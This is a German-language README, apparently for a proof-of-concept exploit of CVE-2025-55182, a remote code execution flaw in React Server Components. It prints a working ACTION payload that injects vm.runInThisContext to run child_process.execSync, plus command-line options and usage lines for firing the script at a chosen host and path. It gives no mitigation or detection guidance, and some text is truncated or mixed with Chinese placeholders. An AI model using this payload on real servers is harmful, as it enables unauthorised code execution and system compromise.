
Proof-of-Concept-Exploit für CVE-2025-55182, der Remote-Code-Ausführung in React Server Components über bösartige ACTION-Payloads und vm.runInThisContext-Injektion demonstriert.
Dieses Projekt ist ein CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept und demonstriert, wie unter bestimmten Bedingungen durch vm.runInThisContext und bösartige ACTION-Payloads eine Remotecodeausführung ausgelöst werden kann.
ACTION-Payloads von React Server Components können unter bestimmten Bedingungen:
Angreifer können folgenden Payload erstellen:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Parameter | Erforderlich | Standardwert | Beschreibung |
|---|---|---|---|
--host | Ja | Keiner | IP oder Domain des Zielservers. Z.B.: 127.0.0.1, 192.168.1.10, example.com |
--port | Nein | 80 | HTTP-Port des Ziels, z.B.: 3003 |
--path | Ja | Keiner | Weg (Route) des Ziels, der die Schwachstelle auslöst, z.B.: /feedback, /action |
--https | Nein | False | Ob HTTPS zum Senden des Payloads verwendet werden soll (Standard HTTP) |
python a.py --host <目标IP> --port <端口> --path <目标URL路径>
python a.py --host 127.0.0.1 --port 3003 --path /feedback